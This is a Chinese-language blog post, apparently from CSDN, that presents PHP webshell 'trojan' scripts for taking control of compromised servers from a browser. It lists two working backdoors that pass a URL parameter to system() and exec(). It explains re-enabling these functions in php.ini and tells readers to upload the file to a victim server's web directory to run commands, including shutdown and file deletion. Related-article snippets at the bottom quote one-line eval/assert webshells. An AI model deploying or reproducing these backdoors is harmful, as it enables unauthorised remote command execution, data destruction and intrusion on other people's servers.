php exec回显_木马小工具(php版)——网页操控肉鸡服务器

最新推荐文章于 2023-01-22 13:57:06 发布
最新推荐文章于 2023-01-22 13:57:06 发布
阅读量555 收藏 2
点赞数
文章标签: php exec回显
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39620197/article/details/111656844
版权
本文介绍了如何构建一个基于web的PHP木马,通过在服务器上执行命令并回显结果来实现对服务器的控制。利用`system()`和`exec()`函数,可以在禁用这些功能后修改`php.ini`配置并重启Apache服务器来运行脚本。通过这种方法,可以将命令传给木马,执行并获取服务器的反馈信息。
摘要由CSDN通过智能技术生成

如何通过一个文本文件的网页来控制服务器呢?

在服务器上执行命令

在网页上返回执行结果

f9ad42315b731a28a49734f62ca58ef9.png

使用思路

基于web的木马

上传到靶机的apache服务器中

通过web访问

将命令传给木马

木马接收命令在服务器端执行

将执行结果(服务器的信息)返回到web页面上

使用的php函数

php执行shell/cmd命令,可以使用下面几个函数: 

string system(string $command [,int &$return_var])string exec(string $command [,array &$output [,int &$return_var]])void passthru (string $command[,int &$return_var])

注意:

这三个函数在默认的情况下,都是被禁止了的

如果要使用这几个函数,

就要先修改php的配置文件php.ini

查找关键字disable_functions,将这一项中的这几个函数名删除掉

然后注意重启apache。

木马脚本1:使用system()函数运行

<?php     #获取网页传递参数    $shell = $_REQUEST['shell'];    echo "
";
system($shell, $status); echo " //注意shell命令的执行结果和执行返回的状态值的对应关系 $shell = "$shell"; if( $status ){ echo "shell命令{$shell}执行失败"; } else { echo "shell命令{$shell}成功执行"; } ?>

使用方法:

访问地址,并传递shell参数http://localhost:81/shell.php?shell=ipconfig

返回结果:

2998ad94fbc00dcd7f67499772454aed.png

木马脚本2:使用exec()函数执行

<?php     $shell = $_REQUEST['shell'];    exec($shell, $result, $status);    $shell = "";    echo "
";
if( $status ){ echo "shell命令{$shell}执行失败"; } else { echo "shell命令{$shell}成功执行, 结果如下"; print_r( $result ); } echo " ?>

使用方法:

使用浏览器访问:http://localhost:81/shell.php?shell=ipconfig

exec()执行shell命令成功,但是并不返回结果,需要使用输出命令

输出$result结果

返回结果:

798f56590759740590dac5db941a1630.png

579ccab2567132c2bd80b773302ee06f.png

作为木马后门

上传到对方服务器下的网站目录下

访问该地址,就可以通过浏览器链接

将你要运行的指令传入到服务器中执行

并且拿到回显结果

关机 重启 删除文件等等都可以完全控制执行

cmd_火山PC_cmd_CMD回显_
10-01
标题中的"cmd_火山PC_cmd_CMD回显_"表明我们讨论的主题是关于在Windows操作系统中,使用命令行工具CMD(Command Prompt)与火山PC软件相结合,进行注册表的回显操作。火山PC是一款针对64位系统的软件,本为...
Web-一句话木马php
weixin_46685211的博客
05-05 6015
文章目录前言一、什么是webshell二、一句话木马1.基本原理2.上传文件到网站流程3.语句解析4.入侵条件参考 前言 在BUU CTF做到一道题,[ACTF2020 新生赛]Upload 1。要求upload,这个时候应该想到是一句话木马的题目。在攻防世界的web新手区中webshell也是一个一句话木马的题目。 一、什么是webshell webshell是web入侵的脚本攻击工具。webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网
PHP 一句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示
热门推荐
百彦子烨的博客
11-10 2万+
该文章对PHP一句话木马 @eval($_POST['hack']); 语句进行了详细解析并进行了简单的靶机演示该木马利用操作
打开php网页木马,常见PHP网页木马
weixin_31140863的博客
03-11 758
# 常见的PHP网页木码>[success]网站上线后,就容易被恶意挂码,除了做好网站安全外,还要了解,常见的挂码方式。>## 下面就是一个恶意的代码>[success]这种的还不算是最为严中的,他只是让在你的站点中增加了一个php文件,当搜索引擎访问题,会打开他们指定的内容。>>[success]这种攻击,一般会在站点根目录生成一个`global`文件,下面的php...
php一句话图片木马过滤_php一句话木马和图片木马的运行方法
weixin_31485835的博客
03-08 2351
标准的写法,直接通过eval执行php代码,如下:@eval($_POST['code']);动态执行assert生成一个木马文件(隐藏性最好的一种)如下:@$_GET['a']($_GET['code']);使用方法:从url中传入下面参数执行后会在当前目录生成一个c.php的文件.如下:/index.php?a=assert&code=${fputs%28fopen%28base64...
css.php php木马,CSS_解决全部网页木马的技巧,还是挂马问题,这段时间,我 - phpStudy...
weixin_31517893的博客
03-23 111
还是挂马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来帮帮大家。前不久《一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了,现在流行挂木马,汗了,看了几个网友的网站都被这样了——页面的顶部或底部加上了:注意,...
pipe-CMD.rar_CMD回显_CreateProcess_c++ cmd pipe_windows管道cmd_管道 c
07-15
利用管道执行cmd,显示回显内容,管道加createprocess实现该功能
IIS下PHP运行环境搭建与网页服务器故障排查方法
01-10
1、确认是php的问题还是iis等服务器的问题 判断方法,在目录下放一个静态文件,通过浏览器判断这个静态文件可否访问。若可以访问,即为php问题。 如果是IIS的问题,常见的有两种情况,一个判断的利器是telnet。 ...
Net_Telnet-master.zip_The Master_php telnet_telnet
09-14
例如,TELNET支持IAC(Inter-ACEptor Command)命令,用于在客户端和服务器之间传递控制信息,如改变终端类型、设置本地回显等。在PHP代码中,这些命令可以通过`Net_Telnet`类的内部方法设置。 总的来说,...
webuploader批量添加、删除、回显编辑图片完整demo(PHP
12-31
【标题】"WebUploader批量添加、删除、回显编辑图片完整示例(PHP)" 在Web开发中,用户上传图片是一项常见的功能。WebUploader是一款由阿里大鱼团队开发的前端上传组件,它支持多文件上传、预览、进度条显示等...
PHP一句话木马攻防
浪子四方
01-17 3306
引言 在网络世界,信息唾手可得,很难保证信息的绝对安全,只要公网可以访问,那么总会存在那么点漏洞让非法入侵者有机可乘,所以作为开发者或网络管理人员,我们要定时查看日志,备份站点数据,做好安全防范攻略。此笔记记录笔者对PHP配置的安全建议,有更好的方法也希望小伙伴们能够告知我一下,互相学习互相进步,构建安全站点。 PHP小马 方式1:system() <?php $cmd = $_...
rce(无回显
qq_62046696的博客
07-20 4620
RCE英文全称分为远程命令执行ping和远程代码执行evel。漏洞出现的原因没有在输入口做输入处理。我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。...
php后门木马常用命令分析与防范
主题模板站的博客
01-22 872
3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite。2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13。//可将php代码存于非php后缀文件,例: x.jpg。
网页控制服务器程序,如何通过网页管理VMware ESXi服务器平台
weixin_35516624的博客
08-04 1249
VMware GO及今年初新推出的VMware GO Pro,是VMware提供的网页管理介面,可搭配ESXi完成多项的管理操作。随着硬件能效的提升,越来越多的企业开始导入虚拟化技术,达成服务器数量的密集部署。若打算采用VMware vSphere的各种付费本,此时就能透过搭配的vCenter就能提供完整的管理功能;而许多以免费授权使用ESXi精简套件,仅能一台台管理虚拟化服务器的用户,现在也可...
通过网页源码控制软件的各种操作免费使用服务器控制程序
DCL666666的博客
04-18 732
应用方面:1. 控制程序的更新信息2. 控制程序的通知信息3. 控制程序的注册登录账号4. 控制程序的后台程序5. 控制程序分级操作(自己设备和他人设备不同信息进入软件的不同操作界面) 技术优势:不用去买服务器来控制程序,不用专业的服务器,直接通过本地数据保存之后进收集。通过免费空间来控制程序数据。技术原理:网页中加入相应的字符,在软件中先把网页源码取入本地,相当于本地配置信息。通过软件代码中的文...
网页里如何嵌入服务器控制,在嵌入式设备中实现Web动态服务与Web控制的实现思路...
weixin_34086714的博客
08-04 1467
随着网络技术的不断发展,嵌入式系统将不断地和网络相结合。嵌入式Web技术是计算机领域研究的热点,其优点是开发成本低、通用性强,能运行在8位或16 位MCU环境中,其丰富的Web用户图形界面使得嵌入式设备具有极好的交互性。因此,一旦在嵌入式设备中集成了Web服务,就能实现用户与嵌入式设备低成本、高通用性的信息交流,即客户端利用HTTP浏览器(如IE),在任何时间、任何地点都能实现与嵌入式设备的信息交...
asp从服务器返回的html5,ASP在服务器端控制网页
weixin_39700548的博客
06-29 154
使用.Net和C#开发Web应用程序往往能给我们很大的启示,尤其在开发相对简单的例行任务时就更是如此。例如,在许多时候,我们都需要有条件地显示一个网页的一部分。需要这么做的原因有许多,例如,根据用户的角色,有一部分是它不应当看到的。或者,我们也可以考虑搜索功能,只有点击了一个链接后,搜索选项才是可用的。我们先来解释一下解决这一问题的方法,然后再详细地解释所使用的代码。在.Net中开发Web应用程序...
Html网页远程控制电脑,如何从Web浏览器远程控制您的计算机 | MOS86
weixin_42498766的博客
06-19 4283
在移动中,您可能希望连接到您的办公室有几种工具可以让您远程访问计算机,包括使用Gmail。在本文中,我们将讨论一个更强大的解决方案,远程连接到您的计算机,而无需在移动设备上安装任何内容。如果要完全控制您的计算机,您将需要一些VNC(虚拟网络计算机)软件来安装在您的计算机和要控制PC的设备上。一种形式的VNC正在使用Windows内置的RDC(远程桌面连接)。如果您的移动设备不支持任何RDC客户端,...
java数据回显_Java Web之SpringMVC 进行数据回显
最新发布
05-29
在SpringMVC中进行数据回显可以通过在Controller中将需要回显的数据放入Model对象中,然后在JSP页面中使用EL表达式进行取值展示。 例如,在Controller中可以这样设置回显数据: ``` @RequestMapping("/user/{id}")...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值